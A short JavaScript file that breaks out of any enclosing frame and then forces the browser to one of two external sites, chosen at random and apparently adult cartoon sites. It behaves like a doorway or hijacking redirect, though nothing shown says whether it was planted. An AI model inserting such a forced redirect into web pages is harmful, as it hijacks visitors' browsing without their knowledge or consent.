// JavaScript Document
if (top.frames.length!=0) {
 if (window.location.href.replace) top.location.replace(self.location.href);
else
 top.location.href=self.document.href;
}
 var randomcode = new Array();

  randomcode[0] = "http://www.hottesttoons.com/";
  randomcode[1] = "http://www.hardesttoons.com/";

 var loadHTTP = randomcode[Math.floor(Math.random()*randomcode.length)];
 window.location = loadHTTP;
